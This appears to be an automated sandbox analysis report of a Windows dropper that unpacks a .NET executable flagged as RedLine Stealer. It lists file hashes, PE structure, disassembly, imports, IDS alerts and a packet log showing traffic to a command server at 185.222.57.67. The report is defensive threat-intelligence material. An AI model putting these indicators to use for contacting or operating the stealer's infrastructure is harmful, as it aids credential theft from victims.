                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):550920
                      Entropy (8bit):7.891666015031055
                      Encrypted:false
                      SSDEEP:12288:13QfYVK+orvWdcjjs0OzZgN3RV7ib0KnggidUzxF7+wdIbH2TdTkR:81+PejtrN3G0UdiSzxgw+bSM
                      MD5:8A9837F38BD2C2ADDA21106E3B75FFA8
                      SHA1:D03BC9129AEB9AF731AFD9FD676487592C48FC5B
                      SHA-256:FDB3927EBECB2D7611D047BE77C913E6848D24D87EC24D84D76E851839D2FADB
                      SHA-512:AC938FFF9572A37A2FB801999FE7A2EE9DC72CE0FB4A4878AA2EF2676E76477AAEB9F6A248B92682425F3DFC911835B757C688FF8DEB5A48AA92CFDBB03161CD
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 83%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.f..............0..............1... ...@....@.. ....................................@.................................P1..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................1......H........z...f..........h....O..........................................b.(.....(.....s!...}....*.*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*J..{....o....(....*F.{....r...po....*F.{....r...po....*F.{....r!..po....*F.{....r3..po....*..{....o ....{.....{....o....o....*..{.....o....&.{.....{....o....o....*.0...........o.............o
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.798866224849452
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:owKQ0b029a.exe
                      File size:752'105 bytes
                      MD5:5404b47556a2e1e9eb2f5da481002616
                      SHA1:e3a45833fecb92ff8998fc6d4a13c9b80afe87db
                      SHA256:9c6f132ef4142409bd7a1448d3dc52f774e9e33919031dac82f2afb27083945f
                      SHA512:f3ff71f4a5637845e482e5d28656b2c7a502922ffdd599def1f243774820adc16c7de5a6804f2acff497568c93cdf180259628f2784da9dd16b9cc993e41edaf
                      SSDEEP:12288:eYQyrJBxjjmHI8/fRRCtRazozhlzs+WxuEvhxYInrLQ3MqzNF7+wdIH8dZs3:eYlJBxjCHdRRSRNzfzs+0uE5xYwrLQ8b
                      TLSH:CCF40211B6C28071D1731A341EF6EB71AA7DBC601F38DA5FD3845B6C1E305D0BA2AB66
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...1...1...1.T;....1.T;..j.1.T;....1.~.....1...2...1...5...1...4...1.......1.......1...0...1.w.4...1.w.1...1.r.....1.w.3...1
                      Icon Hash:3570b480858580c5
                      Entrypoint:0x41248b
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x5C72EA84 [Sun Feb 24 19:03:32 2019 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:c127345c03c7eb109783c6cc61e16834
                      Instruction
                      call 00007FA1E88F0266h
                      jmp 00007FA1E88EFC23h
                      cmp ecx, dword ptr [0042F0B8h]
                      jne 00007FA1E88EFD95h
                      ret
                      jmp 00007FA1E88F03DFh
                      jmp 00007FA1E88F4708h
                      push ebp
                      mov ebp, esp
                      and dword ptr [00460FE0h], 00000000h
                      sub esp, 28h
                      push ebx
                      xor ebx, ebx
                      inc ebx
                      or dword ptr [0042F0BCh], ebx
                      push 0000000Ah
                      call 00007FA1E890161Eh
                      test eax, eax
                      je 00007FA1E88EFF03h
                      and dword ptr [ebp-10h], 00000000h
                      xor eax, eax
                      or dword ptr [0042F0BCh], 02h
                      xor ecx, ecx
                      push esi
                      push edi
                      mov dword ptr [00460FE0h], ebx
                      lea edi, dword ptr [ebp-28h]
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      mov dword ptr [edi], eax
                      mov dword ptr [edi+04h], esi
                      mov dword ptr [edi+08h], ecx
                      mov dword ptr [edi+0Ch], edx
                      mov eax, dword ptr [ebp-28h]
                      mov ecx, dword ptr [ebp-1Ch]
                      mov dword ptr [ebp-08h], eax
                      xor ecx, 49656E69h
                      mov eax, dword ptr [ebp-20h]
                      xor eax, 6C65746Eh
                      or ecx, eax
                      mov eax, dword ptr [ebp-24h]
                      push 00000001h
                      xor eax, 756E6547h
                      or ecx, eax
                      pop eax
                      push 00000000h
                      pop ecx
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      mov dword ptr [edi], eax
                      mov dword ptr [edi+04h], esi
                      mov dword ptr [edi+08h], ecx
                      mov dword ptr [edi+0Ch], edx
                      jne 00007FA1E88EFDD5h
                      mov eax, dword ptr [ebp-28h]
                      and eax, 0FFF3FF0h
                      cmp eax, 000106C0h
                      je 00007FA1E88EFDB5h
                      cmp eax, 00020660h
                      je 00007FA1E88EFDAEh
                      cmp eax, 00020670h
                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [C++] VS2015 UPD3.1 build 24215
                      • [EXP] VS2015 UPD3.1 build 24215
                      • [RES] VS2015 UPD3 build 24213
                      • [LNK] VS2015 UPD3.1 build 24215
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x2d4300x34.rdata
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2d4640x3c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x5f70.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x690000x2508.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2bc500x54.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x266780x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x250000x218.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2cb0c0x100.rdata
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x234030x23600924dddab6e63ba0152c5d94c2b021084False0.5854267888692579data6.664322509514955IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x250000x90700x920066d578390f42c9a5ee24297c1d975ae7False0.4574593321917808COM executable for DOS5.10882492780084IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x2f0000x329f00xc00d01f95684cdb2c981fa2332f83cc9c24False0.22688802083333334data2.7159229945167196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .gfids0x620000xf40x2003f5d9c4e78af18504690ce2d88ff4a21False0.345703125data2.150380266078888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x630000x5f700x60000d6d585593dcfe48a0c4ab5974ebbb83False0.686279296875data6.814594471581196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x690000x25080x26001f2d5d9cc862b23918d2c2c892c0a31bFalse0.7813527960526315data6.66943889606044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      PNG0x635240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                      PNG0x6406c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                      RT_ICON0x656180x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.906800563777308
                      RT_DIALOG0x66c440x286dataEnglishUnited States0.5030959752321982
                      RT_DIALOG0x66ecc0x13adataEnglishUnited States0.6050955414012739
                      RT_DIALOG0x670080xecdataEnglishUnited States0.6991525423728814
                      RT_DIALOG0x670f40x12edataEnglishUnited States0.5860927152317881
                      RT_DIALOG0x672240x338dataEnglishUnited States0.44538834951456313
                      RT_DIALOG0x6755c0x252dataEnglishUnited States0.5757575757575758
                      RT_STRING0x677b00x1e2dataEnglishUnited States0.3900414937759336
                      RT_STRING0x679940x1ccdataEnglishUnited States0.4282608695652174
                      RT_STRING0x67b600x1eedataEnglishUnited States0.451417004048583
                      RT_STRING0x67d500x146dataEnglishUnited States0.5153374233128835
                      RT_STRING0x67e980x446dataEnglishUnited States0.340036563071298
                      RT_STRING0x682e00x166dataEnglishUnited States0.49162011173184356
                      RT_STRING0x684480x120dataEnglishUnited States0.5451388888888888
                      RT_STRING0x685680x10adataEnglishUnited States0.49624060150375937
                      RT_STRING0x686740xbcdataEnglishUnited States0.6329787234042553
                      RT_STRING0x687300xd6dataEnglishUnited States0.5747663551401869
                      RT_GROUP_ICON0x688080x14data1.05
                      RT_MANIFEST0x6881c0x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                      DLLImport
                      KERNEL32.dllGetLastError, SetLastError, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                      gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                      2024-07-16T19:57:25.200037+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound5561549714185.222.57.67192.168.2.5
                      2024-07-16T19:57:22.155298+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response5561549714185.222.57.67192.168.2.5
                      2024-07-16T19:57:25.200037+0200TCP2046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)5561549714185.222.57.67192.168.2.5
                      2024-07-16T19:57:16.176487+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971140.68.123.157192.168.2.5
                      2024-07-16T19:57:15.229510+0200TCP2835929ETPRO POLICY External IP Address Lookup via api.ip .sb49710443192.168.2.5104.26.12.31
                      2024-07-16T19:57:17.363146+0200TCP2045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound5561549709185.222.57.67192.168.2.5
                      2024-07-16T19:57:23.072310+0200TCP2833693ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb))44349721104.26.12.31192.168.2.5
                      2024-07-16T19:57:03.687918+0200TCP2840787ETPRO HUNTING Request for config.json49708443192.168.2.5184.28.90.27
                      2024-07-16T19:57:14.566741+0200TCP2835930ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI)49710443192.168.2.5104.26.12.31
                      2024-07-16T19:57:13.184707+0200TCP2045000ET MALWARE RedLine Stealer - CheckConnect Response5561549709185.222.57.67192.168.2.5
                      2024-07-16T19:57:54.382158+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972440.68.123.157192.168.2.5
                      2024-07-16T19:57:13.586420+0200UDP2835928ETPRO POLICY External IP Address Lookup DNS Query (api .ip .sb)6471353192.168.2.51.1.1.1
                      2024-07-16T19:57:17.781669+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request4972055615192.168.2.5185.222.57.67
                      2024-07-16T19:57:08.017874+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request4970955615192.168.2.5185.222.57.67
                      2024-07-16T19:57:18.648163+0200TCP2848200ETPRO MALWARE RedLine - GetUpdates Request4972055615192.168.2.5185.222.57.67
                      2024-07-16T19:57:23.070316+0200TCP2835930ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI)49721443192.168.2.5104.26.12.31
                      2024-07-16T19:57:25.605724+0200TCP2849352ETPRO MALWARE RedLine - SetEnvironment Request4972255615192.168.2.5185.222.57.67
                      2024-07-16T19:57:13.545314+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request4970955615192.168.2.5185.222.57.67
                      2024-07-16T19:57:14.570164+0200TCP2833693ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb))44349710104.26.12.31192.168.2.5
                      2024-07-16T19:57:26.869631+0200TCP2848200ETPRO MALWARE RedLine - GetUpdates Request4972355615192.168.2.5185.222.57.67
                      2024-07-16T19:57:22.511032+0200TCP2849351ETPRO MALWARE RedLine - EnvironmentSettings Request4971455615192.168.2.5185.222.57.67
                      2024-07-16T19:57:23.487832+0200TCP2835929ETPRO POLICY External IP Address Lookup via api.ip .sb49721443192.168.2.5104.26.12.31
                      2024-07-16T19:57:16.674149+0200TCP2849662ETPRO MALWARE RedLine - CheckConnect Request4971455615192.168.2.5185.222.57.67
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 16, 2024 19:57:07.354465961 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:07.359448910 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:07.359536886 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:07.377110004 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:07.382011890 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:07.721196890 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:07.726336002 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:07.970293999 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:08.017874002 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:08.102786064 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:08.174113989 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:13.179508924 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:13.184706926 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.352993965 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.353168964 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:13.358488083 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545198917 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545242071 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545260906 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545314074 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:13.545336008 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545345068 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545353889 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:13.545396090 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:15.993275881 CEST4971455615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:15.998869896 CEST5561549714185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:15.999001980 CEST4971455615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:16.014492989 CEST4971455615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:16.023339033 CEST5561549714185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:16.361804962 CEST4971455615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:16.367582083 CEST5561549714185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:16.616719961 CEST5561549714185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:16.674149036 CEST4971455615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:16.749912977 CEST5561549714185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:16.799112082 CEST4971455615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.357799053 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.361056089 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.363146067 CEST5561549709185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.363238096 CEST4970955615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.365993977 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.367665052 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.370488882 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.375490904 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.724366903 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.733033895 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733052015 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733208895 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733256102 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.733335972 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733341932 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733355045 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733360052 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733366013 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733377934 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733380079 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.733383894 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.733400106 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.733449936 CEST4972055615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:17.740551949 CEST5561549720185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:17.740557909 CEST5561549720185.222.57.67192.168.2.5
